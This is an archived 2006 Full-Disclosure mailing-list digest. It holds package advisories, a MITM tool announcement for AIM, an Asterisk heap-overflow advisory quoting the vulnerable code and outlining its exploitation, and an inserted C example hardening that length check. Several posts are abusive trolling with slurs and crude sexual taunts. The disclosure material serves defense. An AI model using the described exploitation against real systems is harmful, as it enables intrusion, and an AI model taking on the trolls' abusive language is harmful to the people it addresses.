[Full-disclosure] [SECURITY] [DSA 1196-1] New clamav packages fix arbitrary code execution

2006-10-18 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1196-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
October 19th, 2006                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: clamav
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-4182 CVE-2006-5295

Several remote vulnerabilities have been discovered in the ClamAV malware
scan engine, which may lead to the execution of arbitrary code. The
Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2006-4182

Damian Put discovered a heap overflow error in the script to rebuild
PE files, which could lead to the execution of arbitrary code.

CVE-2006-5295

Damian Put discovered that missing input sanitising in the CHM
handling code might lead to denial of service.

For the stable distribution (sarge) these problems have been fixed in
version 0.84-2.sarge.11. Due to technical problems with the build host
this update lacks a build for the Sparc architecture. It will be
provided soon.

For the unstable distribution (sid) these problems have been fixed in
version 0.88.5-1.

We recommend that you upgrade your clamav packages.


Upgrade Instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:


http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11.dsc
  Size/MD5 checksum:  874 28ac6ad45d008a1a40f1043ce208f7e9

http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11.diff.gz
  Size/MD5 checksum:   176562 4b0c191cf10e3184baee4004c7992b09

http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84.orig.tar.gz
  Size/MD5 checksum:  4006624 c43213da01d510faf117daa9a4d5326c

  Architecture independent components:


http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.84-2.sarge.11_all.deb
  Size/MD5 checksum:   154890 32b1629d649ed6168dd411e0458cca08

http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.84-2.sarge.11_all.deb
  Size/MD5 checksum:   694414 e8160f6502023138511d613240ff8a7a

http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.84-2.sarge.11_all.deb
  Size/MD5 checksum:   123884 82b26302a2c4697b7d58825dd64149c3

  Alpha architecture:


http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:74768 39a1eb656cb857019708e6a9f13e6670

http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:48830 de988902ce6b7a56b0f72daa6e113614

http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:  2176452 e16e6c071d0233820855fb4777b90a7d

http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:42120 fa4bd16b77814caf48f9c32e5ebf10f4

http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:   255774 19ff1809f543ca8aadb819be4b879f44

http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.11_alpha.deb
  Size/MD5 checksum:   285586 e33630652b74d4a2ddb1c936daf4a7ec

  AMD64 architecture:


http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:68850 03fd7d2e437ef1d337236884289f9cfd

http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:44186 3b44c71024838a3d9e367807fe8664dd

http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:  2173268 f41d15ff5a51f3aa601d8bc1f5ddad6a

http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:39988 3ae59e939bb67cb743c655089d7c66a7

http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:   176496 bb458a66c0422f2c567e0f5bc0db6fc0

http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.11_amd64.deb
  Size/MD5 checksum:   259796 ace9bd92aec68b79785d812

[Full-disclosure] [ANNOUNCE] Aimject 0.8

2006-10-18 Thread Jon Oberheide
Aimject 0.8 has been released:

http://jon.oberheide.org/projects/aimject/

Aimject facilitates man-in-the-middle attacks against AOL Instant
Messenger's OSCAR protocol via a simple GTK interface.

Changes since 0.6:
  * integrated ARP/DNS spoofing
  * IP forwarding command execution (linux/*bsd)
  * max screenname length bumped to account for extended names
  * screenname formatting issue fixed to avoid detection during local
message injection

Regards,
Jon Oberheide

-- 
Jon Oberheide <[EMAIL PROTECTED]>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE


signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How To Spot A Narq With Ease

2006-10-18 Thread Ham Beast
lol how r u comin falling for an obvious troll like that and calling the kettle black ?

On 10/18/06, Jason Miller <[EMAIL PROTECTED]> wrote:
> wow you're fucking retarded and show no intelligence at all.
>
> On 10/18/06, vile <[EMAIL PROTECTED]> wrote:
> > ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method!
> >
> > go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ
> > [EMAIL PROTECTED]
> >
> > l8r narqz.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-367-1] Pike vulnerability

2006-10-18 Thread Kees Cook
=== 
Ubuntu Security Notice USN-367-1   October 18, 2006
pike7.6 vulnerability
CVE-2006-4041
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  pike7.6-pg   7.6.13-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

An SQL injection was discovered in Pike's PostgreSQL module.  
Applications using a PostgreSQL database and uncommon character 
encodings could be fooled into running arbitrary SQL commands, which 
could result in privilege escalation within the application, application 
data exposure, or denial of service.

Please refer to http://www.ubuntu.com/usn/usn-288-1 for more detailed
information.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1.diff.gz
  Size/MD5:33641 9cf8608d265816c30f5f604fa6a085eb

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1.dsc
  Size/MD5: 1503 f6610676627575bd075b4438dcf26407

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13.orig.tar.gz
  Size/MD5:  7979900 4fb4a8111e8986161579f8187c13f512

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-dev_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:   226590 0837073b4efeb38bd85b81f5cd82752d

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-doc_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:17166 4a6458eeb774539a7be8f749c8aef786

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-manual_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:  4081894 0542352cd88d41baf409a12ee8f7ff6a

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-meta_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:17264 c89ebcf1da22be06083884416db1bb67

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-reference_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:  5543468 f11f83cdaa2341d94d66a9a68539cea4

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6_7.6.13-1ubuntu0.1_all.deb
  Size/MD5:17328 bc2e9528b1d347b4611135f6746a48e3

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-bzip2_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:26784 524734dc76b7f2d83b823ea04adede2c

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-core_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:  2504566 8d7bafdd7bd5da0a037fc6dd72d5896c

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-gdbm_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5: 7898 20a9f03a4cc7858d6fe41f9d807dcc34

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-gl_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:46996 922c5ad973ce3ee6e12d7b4e9fd35942

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-gtk_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:   177272 2f617d45dad2000863ddf0e4f6156761

http://security.ubuntu.com/ubuntu/pool/main/p/pike7.6/pike7.6-image_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:   375688 56553800698c6af17e0529f9d3055589

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-mysql_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:24204 05266a27dea198e4a8ce41dd3cb7db9d

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-odbc_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:11078 38af730e74c3b4762ea56c1944f9b6b7

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-pcre_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:26982 c040777a742396d7927b1aa1a16510a9

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-perl_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:13920 2b58a270c3a05ec676d4a0c9a95bb65b

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-pg_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:18226 5c8a244cb18f0db31425c5d2e07dea6b

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-sane_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:10558 c58f84b2b91d8ad2ca8ed56cd9fe4d66

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-sdl_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:40046 698ba11b04180b9678fd28ea44a91dd4

http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-svg_7.6.13-1ubuntu0.1_amd64.deb
  Size/MD5:21570 73b99aa071038b408795bf558700d532

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/p/pike7.6/pike7.6-bzip2_7.6.13-1ubuntu0.1_i386.deb
  Size/MD5:  

[Full-disclosure] rPSA-2006-0195-1 kdelibs

2006-10-18 Thread rPath Update Announcements
rPath Security Advisory: 2006-0195-1
Published: 2006-10-18
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
kdelibs=/[EMAIL PROTECTED]:devel//1/3.4.2-5.12-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811
https://issues.rpath.com/browse/RPL-723

Description:
Previous versions of the KDE khtml library use Qt in a way that
allows unchecked pixmap image input to be provided to Qt, triggering
an integer overflow flaw in Qt.  This enables a user-complicit denial
of service attack (application crash), or possibly unauthorized access
via arbitrary code execution.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Security-Assessment.com Advisory: Asterisk remote heap overflow

2006-10-18 Thread Adam Boileau

= Asterisk - chan_skinny Remote Unauthenticated Heap Overflow
=
= Vendor Website:
= http://www.asterisk.org
=
= Affected Version:
=  All 1.2-branch releases prior to and including 1.2.12.1
=  All 1.0-branch releases prior to and including 1.0.12
=
= Not Affected:
=  All 1.4-branch beta releases (1.4.0-beta1, 1.4.0-beta2)
=
= Public disclosure on Oct 19, 2006


== Overview ==

Asterisk is "The Opensource PBX", a popular software telephony server.

The Asterisk Skinny channel driver for Cisco SCCP phones (chan_skinny.so)
incorrectly validates a length value in the packet header. An integer
wrap-around leads to heap overwrite, and arbitrary remote code execution
as root.

== Details ==

The function 'static int get_input(struct skinnysession *s)' in
chan_skinny.c incorrectly validates a user supplied length in the packet
header. In the code below, four bytes of data are read from the socket,
cast to a signed integer, and assigned to dlen. If dlen is between -1
and -8 then (dlen + 8) will integer wrap to be greater than zero, but
less than sizeof(s->inbuf) for the purposes of this comparison.

Next, dlen + 4 is passed to read() as the maximum number of bytes to
write to s->inbuf+4. Read() takes an unsigned value, so dlen is
interpreted as a very large number. For example, a value of -6 is
interpreted as 0xfffa bytes. This instructs read() to write beyond
the allocated 1000 byte length of the buffer s->inbuf.

Code asterisk-1.2.12.1/channels/chan_skinny.c lines 2860-2870

res = read(s->fd, s->inbuf, 4);         // <- integer read from attacker
if (res != 4) {
    ast_log(LOG_WARNING, "Skinny Client sent less data than expected.\n");
    return -1;
}
dlen = letohl(*(int *)s->inbuf);        // <- input 0xfffa
                                        //    interpreted as signed
if (dlen+8 > sizeof(s->inbuf)) {        // <- integer wrap to +2
    dlen = sizeof(s->inbuf) - 8;        //    bypasses this check
}
*(int *)s->inbuf = htolel(dlen);        // casting just for amusement
res = read(s->fd, s->inbuf+4, dlen+4);  /* <- dlen now unsigned again
                                         *  permitting read() to write
                                         *  up to 0xfffa bytes off
                                         *  the end of s->inbuf
                                         */
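The length check described above, as an added example that is not part of the advisory and not Asterisk's own code: the flawed signed comparison is mirrored next to a hardened version that keeps the length unsigned and bounds it before use. The function names vulnerable_read_len and safe_read_len, the INBUF_LEN constant (taken from the 1000-byte figure the advisory gives) and the three constructed headers are assumptions; no socket I/O is done, the functions only return the byte count that read() would be handed. It goes slightly beyond the text by also showing an oversized positive length, which both versions handle.

```c
/* Added example (not from the advisory or from Asterisk's chan_skinny.c):
 * the flawed signed-length check beside a hardened one. Function names,
 * INBUF_LEN and the sample headers are assumptions; no socket I/O is done,
 * the functions only return the byte count that read() would be handed. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define INBUF_LEN 1000   /* the advisory gives s->inbuf as 1000 bytes */

/* Decode the 4-byte little-endian length header (what letohl() does). */
static uint32_t le32_decode(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Mirror of the flawed validation. dlen is a signed int; dlen+8 is computed
 * as int first, so a header of -8..-1 yields a small non-negative value that
 * passes the comparison, and dlen+4 is only converted to size_t when it
 * reaches read(), turning e.g. -2 into SIZE_MAX-1. */
size_t vulnerable_read_len(const unsigned char hdr[4])
{
    char inbuf[INBUF_LEN];
    (void)inbuf;                             /* only its size matters here */
    int dlen = (int)le32_decode(hdr);        /* attacker-controlled, signed */
    if (dlen + 8 > sizeof(inbuf)) {          /* -6+8 == 2: check passes */
        dlen = sizeof(inbuf) - 8;
    }
    return (size_t)(dlen + 4);               /* count handed to read() */
}

/* Hardened version: keep the length unsigned and bound it against the room
 * that actually remains in the buffer before it is used for anything. The
 * packet is rejected rather than clamped; a clamped length would leave the
 * stream out of sync anyway. Returns false when the header is unacceptable. */
bool safe_read_len(const unsigned char hdr[4], size_t *out_len)
{
    uint32_t dlen = le32_decode(hdr);        /* never cast to a signed type */
    const size_t max_payload = INBUF_LEN - 8; /* limit the original intended */
    *out_len = 0;
    if (dlen > max_payload) {
        return false;                        /* rejects 0xfffffffa and 5000 alike */
    }
    *out_len = (size_t)dlen + 4;             /* at most INBUF_LEN-4: fits after inbuf+4 */
    return true;
}

int main(void)
{
    /* Constructed headers: 100, 5000 and -6 (0xfffffffa), little-endian. */
    const unsigned char samples[3][4] = {
        {0x64, 0x00, 0x00, 0x00},
        {0x88, 0x13, 0x00, 0x00},
        {0xfa, 0xff, 0xff, 0xff},
    };
    for (int i = 0; i < 3; i++) {
        size_t n;
        bool ok = safe_read_len(samples[i], &n);
        printf("header 0x%08x: flawed count %zu, hardened %s (%zu)\n",
               le32_decode(samples[i]), vulnerable_read_len(samples[i]),
               ok ? "accepts" : "rejects", n);
    }
    return 0;
}
```

The point of the hardened form is that the bound is checked on the unsigned value the wire actually carries, before any arithmetic, so there is no signed intermediate for a negative header to slip through.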



== Exploitation ==

An attacker who can connect to the Asterisk server SCCP "Skinny" port
(by default 2000/tcp) can attack the vulnerable function prior to
registering as a configured Skinny phone, permitting pre-authentication
remote compromise.

Once the initial length header value in the packet performs an
integer-wraparound an attacker can overflow off the end of the
malloc()ed input buffer, and into heap space above it. Exploitation is
possible via standard heap-overflow malloc-unlink-macro technique[1] on
glibc versions prior to 2.3.5. On systems with newer glibc, a more
sophisticated exploitation method is necessary due to the improved
validation of malloc's internal heap management linked lists. Brett
Moore's work[2] on bypassing similar restrictions in WinXPSP2 is
instructive.

Our proof-of-concept exploit uses vanilla malloc-unlink() to overwrite a
GOT entry to point execution back into our buffer, and executes
Metasploit port-binding shellcode.

== Solutions ==

 - Disable the chan_skinny module if it is not required.
 - Firewall port 2000/tcp from untrusted networks.
 - Install the vendor supplied upgrades:
1.0-branch: Upgrade to 1.0.12 or later
1.2-branch: Upgrade to 1.2.13 or later

== Credit ==

Discovered and advised to Digium 17th October, 2006 by Adam Boileau of
Security-Assessment.com.

Security-Assessment.com commends Digium on their extremely rapid
response, releasing an updated version within two days of receiving our
vulnerability report.

== References ==

[1] "Advanced Doug Lea's Malloc Exploits" by jp
  http://doc.bughunter.net/buffer-overflow/advanced-malloc-exploits.html
[2] "Exploiting Freelist[0] On Windows XP Service Pack 2" by Brett Moore
  http://www.security-assessment.com/technical/

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and
a high level of technical expertise while creating long and lasting
professional relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and pr

Re: [Full-disclosure] How To Spot A Narq With Ease

2006-10-18 Thread Jason Miller
wow you're fucking retarded and show no intelligence at all.

On 10/18/06, vile <[EMAIL PROTECTED]> wrote:
> ok guys, this one is really easy. spotting narqz can usually be hard, but I found a great method!
>
> go to any full-disclosure list, and you'll usually see a bunch of whitehats talking about vulnerabilities. most of these guys are like super hackers, so don't mess with them. however, they are all narqs too! usually anyone who believes in full-disclosure is a possible narq. so do not tell any of these people about how you owned their mom's laptop. they will fucking go CRAZY! CRZYY!!! ROOOAAAR! they will call the local authorities and tell them that you owned their mom's laptop, and the cops will laugh at them. But just so you know, they do actively search for criminalz. just ask some dude if he believes in full-disclosure. if he says yes: NARQ
> [EMAIL PROTECTED]
>
> l8r narqz.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-366-1] binutils vulnerability

2006-10-18 Thread Kees Cook
=== 
Ubuntu Security Notice USN-366-1   October 18, 2006
binutils vulnerability
CVE-2005-4808
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  binutils 2.16.1-2ubuntu6.3
  binutils-static  2.16.1-2ubuntu6.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

A buffer overflow was discovered in gas (the GNU assembler). By
tricking a user or automated system (like a compile farm) into
assembling a specially crafted source file with gcc or gas, this could
be exploited to execute arbitrary code with the user's privileges.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3.diff.gz
  Size/MD5:41663 eb868bd74f535df57afe1cdf6630f5f7

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3.dsc
  Size/MD5:  892 2959647799b6a665bea62066279e2ce7

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1.orig.tar.gz
  Size/MD5: 16378360 818bd33cc45bfe3d5b4b2ddf288ecdea

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-doc_2.16.1-2ubuntu6.3_all.deb
  Size/MD5:   459922 3007ff36ccf1f20d02c92684e74862bd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_amd64.deb
  Size/MD5:  2359216 db2762f982b4a9251f3a9420960c5837

http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_amd64.deb
  Size/MD5:  7202118 66c145b29ecba13265c90ff14eee743d

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_amd64.udeb
  Size/MD5:   605798 7e84c6ae5c9283b6bbc2519dc5ea045b

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_amd64.deb
  Size/MD5:   632032 95ab22250e577fbfc3a7a93b15ca12e4

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_amd64.deb
  Size/MD5:  1553768 3bb85a70948df7436f59fa69746281d7

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_i386.deb
  Size/MD5:  2219910 7eeebf4b5fd5df9887c7e782375f37c2

http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_i386.deb
  Size/MD5:  6748598 f31d91f437947a96c39cc638c7204bcb

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_i386.udeb
  Size/MD5:   500860 340069f8b292df6cadd2f3b6919ce332

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_i386.deb
  Size/MD5:   526798 447e3be6be74c1cc6b3210255965c5dd

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_i386.deb
  Size/MD5:  1470052 efc870689b6d3fd90b9a078670498a5b

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_powerpc.deb
  Size/MD5:  2836604 a70cc1fb92e14aa2ba3d141854fef344

http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_powerpc.deb
  Size/MD5:  8204624 6503f8145c38f0e009236c9625d19538

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_powerpc.udeb
  Size/MD5:   619148 1beb63b658036d46ae917bd41d7fd2b6

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_powerpc.deb
  Size/MD5:   645238 cfe70541d367b7e8345362c10085496f

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.3_powerpc.deb
  Size/MD5:  1653200 dd230b6a61934185aaf084921a1b4df0

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.3_sparc.deb
  Size/MD5:  2198844 f1f90a2b1bdc569ee85c467e79a99bd1

http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.3_sparc.deb
  Size/MD5:  7109028 649c2e8ecd95081d61e8f232dc1c7135

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.3_sparc.udeb
  Size/MD5:   622592 254e2d9f860f0cd7c7d316a6d0338aa3

http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static_2.16.1-2ubuntu6.3_sparc.deb
  Size/MD5:   648510 6aac4122fa6848e2dfd5754da7100a76

http://secur

Re: [Full-disclosure] Analysis of the Oracle October 2006 Critical Patch Update

2006-10-18 Thread vile
i butt fucked your sister, David. She moaned like a little bitch.

On 10/18/06, Paul Schmehl <[EMAIL PROTECTED]> wrote:
> Thanks, David, for your always enlightening (and depressing if you use
> Oracle products) reports on the unbreakable database.
>
> --On Wednesday, October 18, 2006 07:55:35 +0100 David Litchfield
> <[EMAIL PROTECTED]> wrote:
> > Hey all,
> > I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the
> > October 2006 Critical Patch Update that was released yesterday:
> > http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html.
> > Further, it's a shame to see that, after a promising July 2006 CPU where
> > Oracle had all the patches ready *on time*, they have slipped back into
> > their old, bad habits - patches are not ready for a number of platforms.
> > I thought they'd solved those issues - but clearly not. You can get a
> > copy of the analysis from
> > http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf,
> > Cheers,
> > David Litchfield
> > NGSSoftware Ltd
> > http://www.ngssoftware.com/
> > +44(0) 208 401 0070
>
> Paul Schmehl ([EMAIL PROTECTED])
> Adjunct Information Security Officer
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Attacking the local LAN via XSS

2006-10-18 Thread vile
holy shit! you all are the biggest faggots i've ever seen!

On 8/10/06, Florian Weimer <[EMAIL PROTECTED]> wrote:
> * pdp:
> >   1. page that is controlled by the attacker, lets call it evil.com
> >   2. border router vulnerable to XSS
> >   3. user attending evil.com
>
> This has nothing to do with cross-site scripting attacks, it's an
> entirely different vulnerability class called cross-site request
> forgery (CSRF).  A lot of web applications are affected.
>
> Technically, this is a browser vulnerability, but you can't fix it
> there as cross-site requests are too common in the real world.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joe Job - to blue pill

2006-10-18 Thread vile
guess what, losers? i'm god.

On 10/18/06, Larry Pesce <[EMAIL PROTECTED]> wrote:
> William Knowles wrote:
> > One time mailings with companies I have no previous business relationships
> > I can almost forgive, subscribing me to mailing lists without my permission, I
> > can't.
>
> and the e-mails sent to the list do not contain any apparent way to
> unsubscribe.  I don't know about any one else, but I did not get a notice
> that I was subscribed, or how to unsubscribe.
>
> I'm thinking Joe just self-fulfilled his own prophecy on "tons of mailserver
> blacklists by the end of the day today".
>
> So, how about the name of the company that sold you the list, Joe?
>
> - L
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Use Google to discover web attacks

2006-10-18 Thread vile
oh my god! what a ground breaking discovery!@ shut the fuck up you furry faggots. don't ever post again, you knob sucking homos.

On 8/10/06, Valery Marchuk <[EMAIL PROTECTED]> wrote:
> These are traces left by webinspect and Watchfire Appscan
>
> webinspect:
> http://www.google.ru/search?q=serverinclude.html
>
> Watchfire Appscan:
> http://www.google.ru/search?q=watchfire+%22xss+test%22
>
> The article is available in Russian at
> http://www.securitylab.ru/news/271743.php
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] speaking of code crunching... (challenge)

2006-10-18 Thread vile
you all are furry faggots.

On 10/17/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> On Mon, 16 Oct 2006, Gadi Evron wrote:
> > sort of challenge to see if someone else can get there first (without,
> > say, making the URL shorter). :)
>
> Crunched further
>
> New binary at 384 bytes is here:
> http://ragestorm.net/tiny/tiny2.exe
>
> Blog entry on how this was done is here:
> http://blogs.securiteam.com/index.php/archives/679
>
> The relevant text from the blog, a chat session log:
>
> Arkon: The problem with that URLDownloadToFileA is that it creates another
> thread,
> Arkon: and that thread never terminates for some unknown reason to me.
> Arkon: So I HAD to call ExitProcess and finish it, otherwise my process
> will hang. :(
> Arkon: But now what I'm going to do is raising a silent exception :x
